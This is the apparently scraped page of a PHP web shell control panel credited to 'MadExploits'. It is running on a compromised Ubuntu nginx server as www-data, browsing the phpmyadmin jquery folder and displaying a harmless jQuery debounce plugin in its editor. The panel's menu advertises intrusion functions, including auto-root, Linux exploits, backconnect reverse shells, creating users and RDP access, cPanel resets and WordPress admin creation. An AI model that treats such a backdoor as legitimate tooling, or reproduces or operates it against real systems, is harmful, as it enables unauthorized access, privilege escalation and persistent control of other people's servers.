Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
js /
vendor /
jquery /
[ HOME SHELL ]
Name
Size
Permission
Action
additional-methods.js
50.81
KB
-rw-r--r--
jquery-migrate.js
24.71
KB
-rw-r--r--
jquery-ui-timepicker-addon.js
76.71
KB
-rw-r--r--
jquery-ui.min.js
316.97
KB
-rw-r--r--
jquery.ba-hashchange-2.0.js
10.26
KB
-rw-r--r--
jquery.debounce-1.0.6.js
1.57
KB
-rw-r--r--
jquery.fullscreen.js
5.63
KB
-rw-r--r--
jquery.md5.js
11.29
KB
-rw-r--r--
jquery.min.js
87
KB
-rw-r--r--
jquery.min.map
133.97
KB
-rw-r--r--
jquery.mousewheel.js
8.07
KB
-rw-r--r--
jquery.svg.js
55.32
KB
-rw-r--r--
jquery.tablesorter.js
105.57
KB
-rw-r--r--
jquery.uitablefilter.js
3.07
KB
-rw-r--r--
jquery.validate.js
49.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.debounce-1.0.6.js
/** * Debounce and throttle function's decorator plugin 1.0.6 * * Copyright (c) 2009 Filatov Dmitry (alpha@zforms.ru) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/licenses/gpl.html * */ (function ($) { $.extend({ /** * Debounce's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Boolean} [invokeAsap=false] invoke function as soon as possible * @param {Object} [ctx] context of original function */ debounce: function (fn, timeout, invokeAsap, ctx) { if (arguments.length == 3 && typeof invokeAsap != 'boolean') { ctx = invokeAsap; invokeAsap = false; } var timer; return function () { var args = arguments; ctx = ctx || this; invokeAsap && !timer && fn.apply(ctx, args); clearTimeout(timer); timer = setTimeout(function () { invokeAsap || fn.apply(ctx, args); timer = null; }, timeout); }; }, /** * Throttle's decorator * @param {Function} fn original function * @param {Number} timeout timeout * @param {Object} [ctx] context of original function */ throttle: function (fn, timeout, ctx) { var timer, args, needInvoke; return function () { args = arguments; needInvoke = true; ctx = ctx || this; timer || (function () { if (needInvoke) { fn.apply(ctx, args); needInvoke = false; timer = setTimeout(arguments.callee, timeout); } else { timer = null; } })(); }; } }); })(jQuery);
Close